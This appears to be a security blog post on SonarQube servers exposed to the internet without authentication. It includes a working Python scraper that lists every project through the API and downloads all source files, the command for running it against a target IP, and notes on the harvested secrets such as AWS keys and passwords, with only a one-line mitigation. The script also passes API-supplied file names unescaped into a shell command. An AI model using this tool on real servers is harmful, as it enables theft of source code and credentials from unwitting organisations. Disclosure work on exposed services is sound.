SonarQube projects source code scrapper

SonarQube is a platform used for continuous inspection of code quality and code security™

The irony of the “code security” part comes from the fact the almost 3000 SonarQube interfaces are exposed to the internet and most of them don’t require authentication which gives everyone access to the source code of the projects analyzed for quality and security.

Additionally, some SonarQube versions come with the default admin:admin credentials.

And apparently FBI warns that threat actors are abusing misconfigured SonarQube applications to steal source code from US government agencies and businesses.

1. Accessing the source code

Accessing the source code of the existing projects is straight forward, and if no authentication is required we’ll most likely have enough privileges to read the source as well.

In the Projects menu, select the desired project:

Then select the Code menu:

2. Automation

The web interface does not provide the option to download the source code of the projects, but this can be easily achieved using the existing API. Below is a script I wrote to download all the projects existing on a SonarQube instance that does not require authentication:

import requests
import json
import sys
import os

IP = ""
port = ""
source_files = []

if len(sys.argv) != 3:
	print("")
else:
	IP = sys.argv[1]
	port = sys.argv[2]

projects_endpoint = "http://" + IP + ":" + port + "/api/components/search_projects"
projects_json = json.loads(requests.get(projects_endpoint, verify=False).content)

for component in projects_json["components"]:
	print("--------" + component["key"] + "--------")
	page = 1
	leaves_endpoint = "http://" + IP + ":" + port + "/api/components/tree?component="+component["key"]+"&strategy=leaves&ps=500&p="+str(page)
	leaves_json = json.loads(requests.get(leaves_endpoint, verify=False).content)
	for leaf in leaves_json["components"]:
		print(leaf["key"])
		source_files.append(leaf["key"])
	total_leaves = leaves_json["paging"]["total"]
	while total_leaves >= 500:
		total_leaves = total_leaves - 500
		page = page + 1
		leaves_endpoint = "http://" + IP + ":" + port + "/api/components/tree?component="+component["key"]+"&strategy=leaves&ps=500&p="+str(page)
		leaves_json = json.loads(requests.get(leaves_endpoint, verify=False).content)
		for leaf in leaves_json["components"]:
			print(leaf["key"])
			source_files.append(leaf["key"])

for path in source_files:
	folder_path = IP + "/" + path.replace(":",'/')
	API_endpoint = "http://" + IP + ":" + port + "/api/sources/raw?key="+ path
	cmd = "curl -o " + folder_path + " --create-dirs " + API_endpoint
	os.system(cmd)

To run it, we need to provide the IP address where SonarQube is hosted and the port:

python3 SonarQubeScrapper.py 1.1.1.1 9000

3. Finding sensitive information

As expected, many developers are still storing sensitive information directly in the source code which makes them vulnerable in scenarios like this where the code is leaked. Going through several of these projects it was possible to find:

  • AWS keys
  • JWT secret keys
  • Email/FTP/SSH passwords
  • Backdoor accounts
  • Vulnerabilities in the code

For some quick hits, I’ve tried using Hamburglar but the most interesting info was found using manual auditing of the code.

4. Mitigations

Don’t expose your SonarQube instance to the internet without a password, neither with the default one. And of course, improve your coding standards, but I guess that’s what SonarQube is for 🙂


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s